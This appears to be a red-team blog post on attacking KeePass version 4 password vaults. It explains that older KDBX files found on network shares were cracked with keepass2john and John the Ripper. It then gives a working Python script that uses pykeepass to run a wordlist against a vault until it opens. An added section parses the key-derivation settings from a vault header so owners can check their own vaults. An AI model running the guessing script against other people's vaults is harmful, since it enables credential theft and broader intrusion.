Guessing KeePass version 4 Passwords
Earlier versions of the commonly used KeePass password manager were a blessing in disguise whenever you came across their files during a Red Team, and they were easy to find. Just search for *.kdbx files on shares!
The password hashes from the KDBX files were easily extracted using John the Ripper's keepass2john tool. Then you could use John and your favorite wordlist to quickly crack some passwords, which led to more credentials that the user thought they were protecting. It was so much fun and always an easy win.
However, with version 4 of KeePass, John can no longer extract the hash, so cracking is not possible. But we can still guess the passwords. I recently discovered that there is a module known as pykeepass, and it makes writing a KeePass password guesser very easy in Python. Here is one I just wrote real quick.
from pykeepass import PyKeePass, exceptions
from sys import argv, exit
from os.path import basename

# Supply the version 4 KeePass file as an argument
if len(argv) != 2:
    print("Usage:", basename(argv[0]), "KeePass.kdbx")
    exit(1)

# Set the password file to use (one candidate per line)
PASSWORDS = "/tmp/passwords.txt"

# Read in each password to try
with open(PASSWORDS) as passwords:
    for password in passwords:
        # strip off the line feed at the end (only the newline, so a trailing space survives)
        password = password.rstrip("\r\n")
        try:
            # This prints the password being tried on the same line each time through the loop
            print("\r" + password + "\033[K", end="", flush=True)
            # pykeepass derives the key and tries to decrypt; a wrong password raises CredentialsError
            kp = PyKeePass(argv[1], password=password)
        except exceptions.CredentialsError:
            continue
        else:
            print("\nYou guessed it!")
            exit()

print("\nThe password could not be guessed.")
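Whether John can pull a hash, and how slow each pykeepass attempt is, both come down to the format version and the key derivation function the vault was saved with. As an added example (not part of the original post), the parser below reads those from the KDBX 4 outer header so you can check that your own vaults use Argon2 with meaningful memory and iteration settings; the sample header at the bottom is constructed for the demonstration and is not a real vault.

```python
import struct, uuid

KDBX_SIG = (0x9AA2D903, 0xB54BFB67)
HDR_END, HDR_KDF = 0x00, 0x0B                  # outer header field IDs
KDF_NAMES = {                                  # KeePass KDF engine UUIDs
    uuid.UUID("c9d9f39a-628a-4460-bf74-0d08c18a4fea").bytes: "AES-KDF",
    uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c").bytes: "Argon2d",
    uuid.UUID("9e298b19-56db-4773-b23d-fc3ec6f0a1e6").bytes: "Argon2id",
}
VD_INTS = {0x04: "<I", 0x05: "<Q", 0x0C: "<i", 0x0D: "<q"}  # VariantDictionary int types

def parse_variant_dict(data):
    """Decode a KDBX4 VariantDictionary; ints are unpacked, everything else stays bytes."""
    pos, out = 2, {}                            # skip the 2-byte version (0x0100)
    while data[pos] != 0:                       # type byte 0 ends the dictionary
        vtype, klen = struct.unpack_from("<Bi", data, pos)
        key = data[pos + 5:pos + 5 + klen].decode()
        vlen = struct.unpack_from("<i", data, pos + 5 + klen)[0]
        raw = data[pos + 9 + klen:pos + 9 + klen + vlen]
        out[key] = struct.unpack(VD_INTS[vtype], raw)[0] if vtype in VD_INTS else raw
        pos += 9 + klen + vlen
    return out

def kdf_info(blob):
    """Return (major, minor, kdf_name, params) from a KDBX 4 file's raw bytes."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", blob)
    if (sig1, sig2) != KDBX_SIG or major != 4:
        raise ValueError("not a KDBX 4 file")
    pos = 12
    while True:                                 # walk outer header fields to KdfParameters
        fid, size = struct.unpack_from("<BI", blob, pos)
        value, pos = blob[pos + 5:pos + 5 + size], pos + 5 + size
        if fid == HDR_END:
            raise ValueError("header has no KDF parameters")
        if fid == HDR_KDF:
            params = parse_variant_dict(value)
            return major, minor, KDF_NAMES.get(params["$UUID"], "unknown"), params

def _vd(entries):
    """Encode a VariantDictionary (only needed to build the constructed sample)."""
    body = b"".join(struct.pack("<Bi", t, len(k)) + k.encode() + struct.pack("<i", len(v)) + v
                    for k, t, v in entries)
    return b"\x00\x01" + body + b"\x00"

# Constructed sample, not a real vault: KDBX 4.1 header using Argon2d, 64 MiB, 2 passes
SAMPLE_KDF = _vd([("$UUID", 0x42, uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c").bytes),
                  ("S", 0x42, b"\x11" * 32), ("P", 0x04, struct.pack("<I", 2)),
                  ("M", 0x05, struct.pack("<Q", 64 << 20)), ("I", 0x05, struct.pack("<Q", 2)),
                  ("V", 0x04, struct.pack("<I", 0x13))])
SAMPLE_KDBX = (struct.pack("<IIHH", *KDBX_SIG, 1, 4)
               + struct.pack("<BI", HDR_KDF, len(SAMPLE_KDF)) + SAMPLE_KDF
               + struct.pack("<BI", HDR_END, 4) + b"\r\n\r\n")
```

For a real file, pass `open(path, "rb").read()` to `kdf_info`; an AES-KDF result carries the round count under "R", Argon2 carries memory in bytes under "M" and passes under "I".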